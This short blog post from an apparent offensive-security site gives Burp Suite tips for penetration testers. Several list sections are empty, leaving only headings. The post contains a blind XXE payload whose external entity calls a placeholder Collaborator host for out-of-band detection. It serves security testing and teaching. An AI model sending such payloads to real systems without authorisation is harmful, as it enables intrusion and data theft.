0xFFFF

offensive security research

Getting More Out of Burp Suite: Tips, Extensions, and Workflows

2021-08-20

Most people use maybe 20% of Burp Suite's capabilities. Here are the extensions, configurations, and workflows that will make you significantly more effective.

Essential extensions

Install these from the BApp Store before you do anything else:

Session handling rules

Burp's session handling rules are underused and incredibly powerful. Configure them under Project Options > Sessions.

Intruder attack types

Most people only use Sniper mode. Learn the others:

Collaborator for blind testing

Burp Collaborator is your best friend for blind vulnerabilities:

# Blind XXE with Collaborator exfiltration
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://YOUR-COLLAB-ID.burpcollaborator.net/xxe">
]>
<root>&xxe;</root>

Workflow tips

The PortSwigger Web Security Academy is the best free resource for learning to use Burp effectively in realistic scenarios. Work through the labs.